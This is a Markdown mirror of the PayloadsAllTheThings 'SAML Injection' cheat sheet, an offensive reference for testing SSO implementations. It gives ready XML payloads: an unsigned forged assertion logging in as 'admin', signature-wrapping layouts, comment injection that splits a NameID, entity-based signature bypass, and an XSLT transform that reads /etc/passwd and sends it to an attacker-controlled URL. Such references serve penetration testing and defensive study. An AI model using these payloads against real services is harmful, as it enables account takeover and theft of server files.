index.md (11993B)
1 --- 2 title: "SAML Injection" 3 topic: "SAML Injection" 4 topicSlug: "saml-injection" 5 sourcePath: "SAML Injection/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/SAML%20Injection/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # SAML Injection 12 13 > SAML (Security Assertion Markup Language) is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. While SAML is widely used to facilitate single sign-on (SSO) and other federated authentication scenarios, improper implementation or misconfiguration can expose systems to various vulnerabilities. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [Invalid Signature](#invalid-signature) 20 * [Signature Stripping](#signature-stripping) 21 * [XML Signature Wrapping Attacks](#xml-signature-wrapping-attacks) 22 * [XML Comment Handling](#xml-comment-handling) 23 * [XML External Entity](#xml-external-entity) 24 * [Extensible Stylesheet Language Transformation](#extensible-stylesheet-language-transformation) 25 * [References](#references) 26 27 ## Tools 28 29 * [CompassSecurity/SAMLRaider](https://github.com/SAMLRaider/SAMLRaider) - SAML2 Burp Extension. 30 * [d0ge/XSW](https://github.com/d0ge/XSW) - XML Signature Wrapping Burp Suite Extensions. 31 * [ZAP Addon/SAML Support](https://www.zaproxy.org/docs/desktop/addons/saml-support/) - Allows to detect, show, edit, and fuzz SAML requests. 32 33 ## Methodology 34 35 A SAML Response should contain the `<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"`. 36 37 ### Invalid Signature 38 39 Signatures which are not signed by a real CA are prone to cloning. Ensure the signature is signed by a real CA. If the certificate is self-signed, you may be able to clone the certificate or create your own self-signed certificate to replace it. 40 41 ### Signature Stripping 42 43 > [...]accepting unsigned SAML assertions is accepting a username without checking the password - @ilektrojohn 44 45 The goal is to forge a well formed SAML Assertion without signing it. For some default configurations if the signature section is omitted from a SAML response, then no signature verification is performed. 46 47 Example of SAML assertion where `NameID=admin` without signature. 48 49 ```xml 50 <?xml version="1.0" encoding="UTF-8"?> 51 <saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:7001/saml2/sp/acs/post" ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0"> 52 <saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameidformat:entity">REDACTED</saml2:Issuer> 53 <saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"> 54 <saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /> 55 </saml2p:Status> 56 <saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="id3945308408248426654986295" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0"> 57 <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">REDACTED</saml2:Issuer> 58 <saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"> 59 <saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">admin</saml2:NameID> 60 <saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> 61 <saml2:SubjectConfirmationData NotOnOrAfter="2018-04-22T10:33:53.593Z" Recipient="http://localhost:7001/saml2/sp/acs/post" /> 62 </saml2:SubjectConfirmation> 63 </saml2:Subject> 64 <saml2:Conditions NotBefore="2018-04-22T10:23:53.593Z" NotOnOrAfter="2018-0422T10:33:53.593Z" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"> 65 <saml2:AudienceRestriction> 66 <saml2:Audience>WLS_SP</saml2:Audience> 67 </saml2:AudienceRestriction> 68 </saml2:Conditions> 69 <saml2:AuthnStatement AuthnInstant="2018-04-22T10:28:49.876Z" SessionIndex="id1524392933593.694282512" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"> 70 <saml2:AuthnContext> 71 <saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef> 72 </saml2:AuthnContext> 73 </saml2:AuthnStatement> 74 </saml2:Assertion> 75 </saml2p:Response> 76 ``` 77 78 ### XML Signature Wrapping Attacks 79 80 XML Signature Wrapping (XSW) attack, some implementations check for a valid signature and match it to a valid assertion, but do not check for multiple assertions, multiple signatures, or behave differently depending on the order of assertions. 81 82 * **XSW1**: Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature. 83 * **XSW2**: Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature. 84 * **XSW3**: Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion. 85 * **XSW4**: Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion within the existing Assertion. 86 * **XSW5**: Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message. 87 * **XSW6**: Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature. 88 * **XSW7**: Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion. 89 * **XSW8**: Applies to SAML Assertion messages. Add an “Object” block containing a copy of the original assertion with the signature removed. 90 91 In the following example, these terms are used. 92 93 * **FA**: Forged Assertion 94 * **LA**: Legitimate Assertion 95 * **LAS**: Signature of the Legitimate Assertion 96 97 ```xml 98 <SAMLResponse> 99 <FA ID="evil"> 100 <Subject>Attacker</Subject> 101 </FA> 102 <LA ID="legitimate"> 103 <Subject>Legitimate User</Subject> 104 <LAS> 105 <Reference Reference URI="legitimate"> 106 </Reference> 107 </LAS> 108 </LA> 109 </SAMLResponse> 110 ``` 111 112 In the Github Enterprise vulnerability, this request would verify and create a sessions for `Attacker` instead of `Legitimate User`, even if `FA` is not signed. 113 114 ### XML Comment Handling 115 116 A threat actor who already has authenticated access into a SSO system can authenticate as another user without that individual’s SSO password. This [vulnerability](https://www.bleepstatic.com/images/news/u/986406/attacks/Vulnerabilities/SAML-flaw.png) has multiple CVE in the following libraries and products. 117 118 * OneLogin - python-saml - CVE-2017-11427 119 * OneLogin - ruby-saml - CVE-2017-11428 120 * Clever - saml2-js - CVE-2017-11429 121 * OmniAuth-SAML - CVE-2017-11430 122 * Shibboleth - CVE-2018-0489 123 * Duo Network Gateway - CVE-2018-7340 124 125 Researchers have noticed that if an attacker inserts a comment inside the username field in such a way that it breaks the username, the attacker might gain access to a legitimate user's account. 126 127 ```xml 128 <SAMLResponse> 129 <Issuer>https://idp.com/</Issuer> 130 <Assertion ID="_id1234"> 131 <Subject> 132 <NameID>user@user.com<!--XMLCOMMENT-->.evil.com</NameID> 133 ``` 134 135 Where `user@user.com` is the first part of the username, and `.evil.com` is the second. 136 137 ### XML External Entity 138 139 An alternative exploitation would use `XML entities` to bypass the signature verification, since the content will not change, except during XML parsing. 140 141 In the following example: 142 143 * `&s;` will resolve to the string `"s"` 144 * `&f1;` will resolve to the string `"f1"` 145 146 ```xml 147 <?xml version="1.0" encoding="UTF-8"?> 148 <!DOCTYPE Response [ 149 <!ENTITY s "s"> 150 <!ENTITY f1 "f1"> 151 ]> 152 <saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" 153 Destination="https://idptestbed/Shibboleth.sso/SAML2/POST" 154 ID="_04cfe67e596b7449d05755049ba9ec28" 155 InResponseTo="_dbbb85ce7ff81905a3a7b4484afb3a4b" 156 IssueInstant="2017-12-08T15:15:56.062Z" Version="2.0"> 157 [...] 158 <saml2:Attribute FriendlyName="uid" 159 Name="urn:oid:0.9.2342.19200300.100.1.1" 160 NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> 161 <saml2:AttributeValue> 162 &s;taf&f1; 163 </saml2:AttributeValue> 164 </saml2:Attribute> 165 [...] 166 </saml2p:Response> 167 ``` 168 169 The SAML response is accepted by the service provider. Due to the vulnerability, the service provider application reports "taf" as the value of the "uid" attribute. 170 171 ### Extensible Stylesheet Language Transformation 172 173 An XSLT can be carried out by using the `transform` element. 174 175  176 Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) 177 178 ```xml 179 <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> 180 ... 181 <ds:Transforms> 182 <ds:Transform> 183 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 184 <xsl:template match="doc"> 185 <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/> 186 <xsl:variable name="escaped" select="encode-for-uri($file)"/> 187 <xsl:variable name="attackerUrl" select="'http://[ATTACKER.DOMAIN.TLD]/'"/> 188 <xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/> 189 <xsl:value-of select="unparsed-text($exploitUrl)"/> 190 </xsl:template> 191 </xsl:stylesheet> 192 </ds:Transform> 193 </ds:Transforms> 194 ... 195 </ds:Signature> 196 ``` 197 198 ## References 199 200 * [Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them - Jem Jensen - March 7, 2017](https://web.archive.org/web/20171113204302/https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) 201 * [How to Hunt Bugs in SAML; a Methodology - Part I - Ben Risher (@epi052) - March 7, 2019](https://web.archive.org/web/20260119151024/https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/) 202 * [How to Hunt Bugs in SAML; a Methodology - Part II - Ben Risher (@epi052) - March 13, 2019](https://web.archive.org/web/20190511102027/https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) 203 * [How to Hunt Bugs in SAML; a Methodology - Part III - Ben Risher (@epi052) - March 16, 2019](https://web.archive.org/web/20250619124546/https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/) 204 * [On Breaking SAML: Be Whoever You Want to Be - Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen - August 23, 2012](https://web.archive.org/web/20130520064525/https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91-8-23-12.pdf) 205 * [Oracle Weblogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933) - Denis Andzakovic - July 18, 2018](https://web.archive.org/web/20181221074856/https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities) 206 * [SAML Burp Extension - Roland Bischofberger - July 24, 2015](https://web.archive.org/web/20260213191343/https://blog.compass-security.com/2015/07/saml-burp-extension/) 207 * [SAML Security Cheat Sheet - OWASP - February 2, 2019](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SAML_Security_Cheat_Sheet.md) 208 * [The road to your codebase is paved with forged assertions - Ioannis Kakavas (@ilektrojohn) - March 13, 2017](https://web.archive.org/web/20170314055835/http://www.economyofmechanism.com/github-saml) 209 * [Truncation of SAML Attributes in Shibboleth 2 - redteam-pentesting.de - January 15, 2018](https://web.archive.org/web/20190607070528/https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-013/-truncation-of-saml-attributes-in-shibboleth-2) 210 * [Vulnerability Note VU#475445 - Garret Wassermann - February 27, 2018](https://web.archive.org/web/20180227170113/http://kb.cert.org/vuls/id/475445)